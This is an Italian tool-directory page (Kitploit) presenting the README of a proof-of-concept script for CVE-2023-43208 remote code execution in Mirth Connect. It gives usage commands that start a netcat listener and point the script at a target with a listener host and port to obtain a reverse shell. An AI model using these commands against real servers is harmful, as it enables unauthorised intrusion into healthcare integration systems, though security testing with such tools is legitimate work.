Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-43208 — PoC per CVE-2023-43208 RCE exploitation. | Kitploit
Strumenti/GitHubGitHub/predyy/cve-2023-43208
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubpredyy/cve-2023-43208

CVE-2023-43208

PoC per CVE-2023-43208 RCE exploitation.

Vedi Repository
115 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-43208 Mirth Connect RCE PoC

Script Python proof-of-concept che mira a CVE-2023-43208 in Mirth Connect.

Disclaimer

Utilizzare solo in ambienti di cui si possiede l'autorizzazione esplicita al test. Questo repository è destinato a ricerca sulla sicurezza, validazione e test difensivi. L'autore non si assume alcuna responsabilità per uso improprio o danni causati da questo strumento.

Panoramica

exp.py è una versione a dipendenze minime del PoC che:

  • Rileva se un target sembra essere un'istanza Mirth Connect
  • Richiede la versione di Mirth Connect da /api/server/version
  • Verifica se la versione è inferiore a 4.4.1
  • Invia un payload XML a /api/users se il target appare vulnerabile

Lo script utilizza per impostazione predefinita HTTPS e può essere commutato su HTTP con --http.

Utilizzo

root@kitploit:~
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]

Argomenti

  • -u, --url: URL o host del target Mirth Connect
  • -lh, --lhost: Host/IP locale per la connessione inversa
  • -lp, --lport: Porta di ascolto locale
  • --http: Forza HTTP invece di HTTPS (predefinito è HTTPS)

Esempio

Avviare prima un listener:

root@kitploit:~
nc -lvnp 4444

Eseguire lo script:

root@kitploit:~
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444

Per un target solo HTTP:

root@kitploit:~
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http

Note

  • La verifica del certificato SSL è disabilitata nello script.
  • Lo script chiede conferma prima di inviare il payload.
  • Il rilevamento della versione si basa sul confronto semantico con 4.4.1.
  • Un target rilevato come Mirth Connect non è garantito essere sfruttabile (la rete, l'ambiente e le differenze di runtime possono influenzare i risultati).

Crediti

  • Scoperta vulnerabilità originale: IHTeam
  • Codice originale: K3ysTr0K3R e Chocapikk
  • Versione a dipendenze minime: predyy
Scarica lo strumento